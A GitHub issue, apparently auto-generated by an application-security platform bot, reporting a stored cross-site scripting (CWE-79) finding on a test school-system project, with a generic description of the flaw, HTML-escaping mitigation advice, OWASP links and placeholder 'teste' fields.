Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RGB_00003.002 - AppSec Flow: Vulnerabilidade - (Stored XSS) Stored Cross-Site Scripting #10

Open
conviso-platform-appsec-staging bot opened this issue Oct 20, 2020 · 1 comment

Comments

@conviso-platform-appsec-staging

ID: RGB_00003.002

Categoria: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Reportado por: Rodrigo Reginato

Projeto: reginato/school-system-test

Criticidade:

Impacto: Alto

Probabilidade: Alto

Criticidade: Crítico

Padrões: [2013] A3 – Cross-Site Scripting (XSS), CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Descrição: The vulnerability of Cross-Site Scripting (XSS) could allow an attacker to get sensitive information from the web application. This flaw could permit the unauthorized access of an attacker. The exploitation of a XSS flaw is made after the injection of malicious code in the scope of application, doing that, the legitimate user executes this malicious code, sending back to the attacker sensitive information like cookies.

Descrição do Impacto: Aguardando preenchimento

Solução: The first step in order to mitigate the problems of XSS is to identify all points of the application where user supplied data is used in the construction of response pages. This identification procedure should include not only the points where data from a particular request are copied directly to the response pages, but must also consider any point where the data supplied by the user is persisted by the application to be shown later, this happens, for example, with the information from the submission of a registration form.
It is recommended that validation that govern the data flow input to be made based on the context of the information being received, for example, numeric fields should receive strictly numeric characters, rejecting any different character set which the application expects. This same procedure should be followed for other form fields according to the information type they wish to accept in the application: names, e-mail, phones, among others. This goal can be achieved using regular expressions to filter out unwanted character sets considered based on the context of the information received.
With respect to the validation that follows the output stream of the application data when the information is actually used to build the answers, you should ensure that potentially malicious characters are replaced as proposed by the escape sequences defined in HTML. A well-defined set of HTML entities should be used to replace literal characters as follows:
char “ replaced by "
char ‘ replaced by '
char & replaced by &
char < replaced by &lt;
char > replaced by &gt;
In order to achieve excellence regarding the creation of filters, it is strongly recommended to adopt coding in HTML for any character not in the set of alphanumeric characters including whitespace (whitespace).

Referência: https://www.owasp.org/index.php/XSS
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Testing_for_Cross_site_scripting
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://www.youtube.com/watch?v=Z9RQSnf8-g
 

Tipo de falha:

**Código:**teste

**Entrada de dados:**teste

**Saída de dados:**teste

Defect Tracker: https://app.conviso.com.br/scopes/193/projects/2186

@reginato
Copy link
Owner

teste

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant